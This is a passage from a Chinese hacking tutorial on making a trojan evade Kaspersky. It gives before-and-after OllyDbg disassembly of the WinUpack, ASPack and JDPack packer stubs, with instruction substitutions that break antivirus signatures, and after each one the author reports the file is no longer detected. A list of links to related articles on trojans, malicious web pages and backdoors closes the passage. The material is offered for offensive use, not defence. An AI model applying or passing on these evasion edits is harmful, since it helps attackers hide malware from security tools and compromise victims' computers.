[推荐]简单修改木马壳头让卡巴斯基哑口无言三、winupack的测试
OD载入被加了壳的DT,如下
00526740 w> 60 pushad
00526741 E8 09000000 call winupack.0052674F
00526746 BE 651200E9 mov esi,E9001265
0052674B 06 push es
0052674C 1200 add al,byte ptr ds:[eax]
0052674E 1033 add byte ptr ds:[ebx],dh
00526750 C9 leave
00526751 5E pop esi
00526752 870E xchg dword ptr ds:[esi],ecx
00526754 ^ E3 F4 jecxz short winupack.0052674A
00526756 1BF1 sub esi,ecx
00526758 8BDE mov ebx,esi
0052675A AD lods dword ptr ds:[esi]
0052675B 1BD8 sub ebx,eax
0052675D AD lods dword ptr ds:[esi]
做了修改的如下
00526740 w> 60 pushad
00526741 E8 09000000 call winupack.0052674F
00526746 BE 651200E9 mov esi,E9001265
0052674B 06 push es
0052674C 1200 adc al,byte ptr ds:[eax]
0052674E 1033 adc byte ptr ds:[ebx],dh
00526750 C9 leave
00526751 5E pop esi
00526752 870E xchg dword ptr ds:[esi],ecx
00526754 ^ E3 F4 jecxz short winupack.0052674A
00526756 1BF1 sbb esi,ecx
00526758 8BDE mov ebx,esi
0052675A AD lods dword ptr ds:[esi]
0052675B 1BD8 sbb ebx,eax
0052675D AD lods dword ptr ds:[esi]
卡巴扫描,不再报毒。
四、ASPack的修改
同样OD载入复制出前面的十几行反汇编代码,注意这个在载入之后把滚动条再向上拉一行。复制出来如下
004CC000 90 nop
004CC001 a> 60 pushad
004CC002 E8 03000000 call asp.004CC00A
004CC007 - E9 EB045D45 jmp 45A9C4F7
004CC00C 55 push ebp
004CC00D C3 retn
004CC00E E8 01000000 call asp.004CC014
004CC013 EB 5D jmp short asp.004CC072
004CC015 BB EDFFFFFF mov ebx,-13
004CC01A 03DD add ebx,ebp
004CC01C 81EB 00C00C00 sub ebx,0CC000
004CC022 83BD 22040000 00 cmp dword ptr ss:[ebp+422],0
修改后如下,对照前面地址一一对应的修改
004CC000 60 pushad
004CC001 a> 90 nop
004CC002 E8 03000000 call asp.004CC00A
004CC007 E8 EB045D45 call 45A9C4F7
004CC00C 55 push ebp
004CC00D C3 retn
004CC00E E8 01000000 call asp.004CC014
004CC013 73 5D jnb short asp.004CC072
004CC015 BB EDFFFFFF mov ebx,-13
004CC01A 11EB adc ebx,ebp
004CC01C 81C3 0040F3FF add ebx,FFF34000
004CC022 83BD 22040000 00 cmp dword ptr ss:[ebp+422],0
卡巴扫描,不再报毒。
五 JDPACK的修改
这个是修改最复杂的一个。几乎面目全非了。但是能够保证运行的。修改前,如下
004CC000 复> 60 pushad
004CC001 E8 00000000 call 复件_(8).004CC006
004CC006 5D pop ebp
004CC007 8BD5 mov edx,ebp
004CC009 81ED C62B4000 sub ebp,复件_(8).00402BC6
004CC00F 2B95 61344000 sub edx,dword ptr ss:[ebp+403461]
004CC015 81EA 06000000 sub edx,6
004CC01B 8995 65344000 mov dword ptr ss:[ebp+403465],edx
004CC021 83BD 69344000 00 cmp dword ptr ss:[ebp+403469],0
修改后的
004CC000 复> 90 nop
004CC001 E8 00000000 call 复件_(8).004CC006
004CC006 5D pop ebp
004CC007 8BC5 mov eax,ebp
004CC009 8BD0 mov edx,eax
004CC00B 81ED C62B4000 sub ebp,复件_(8).00402BC6
004CC011 2B95 61344000 sub edx,dword ptr ss:[ebp+403461]
004CC017 83C2 FA add edx,-6
004CC01A 8995 65344000 mov dword ptr ss:[ebp+403465],edx
004CC020 90 nop
004CC021 83BD 69344000 00 cmp dword ptr ss:[ebp+403469],0
这个真的是让我改的面目全非了 ,不过你可以把004CC021前面的都NOP掉,然后一行一行汇编上去就可以了。
| 简单修改木马壳头让卡巴斯基哑口 | 09-22 | |
| 认识使用 Rootkit技术的木马 | 06-12 | |
| 分析ANI智能网马挂马 | 06-08 | |
| Flash木马是这样练成的 | 05-18 | |
| XML木马研究 | 05-18 | |
| 脚本图片类后门病毒的完美使用方 | 05-16 | |
| 两个批量挂马脚本 | 05-11 | |
| 黑客技术之打造不死的ASP木马的方 | 04-20 | |
| php后门插在图片里执行回显思路 | 04-06 | |
| 2007年IE 0day 网马 | 04-02 | |
| 修改特征码打造免杀后门之灰鸽子 | 04-02 | |
| 挂马代码大全 | 03-22 | |
您现在的位置: